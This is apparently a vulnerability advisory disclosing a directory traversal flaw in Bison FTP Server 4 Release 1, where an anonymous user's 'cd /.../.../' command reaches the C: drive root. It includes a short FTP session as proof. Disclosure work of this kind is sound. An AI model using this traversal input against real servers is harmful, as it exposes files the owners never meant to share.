COMMAND

    Bison FTP Server

SYSTEMS AFFECTED

    Bison FTP Server version 4 Release 1

PROBLEM

    t-Omicr0n found following.  Bison FTP Server is an FTP server  for
    Windows 9x/NT.  A bug allows any user to change to any directory.

    When sending  the command  "CWD ..."  (or "cd  ..." in the default
    UNIX FTP client), the server will go one directory up.

        <snip>
        230 User anonymous logged in.
        Remote system type is UNIX.
        Using binary mode to transfer files.
        ftp> cd /.../.../
        250 CWD command successful.
        ftp> ls
        200 PORT command successful.
        150 Opening ASCII mode data connection for /.
        <directory listing of c:\>
        ftp> quit
        221 Bye.

SOLUTION

    At this time, no patch is available yet.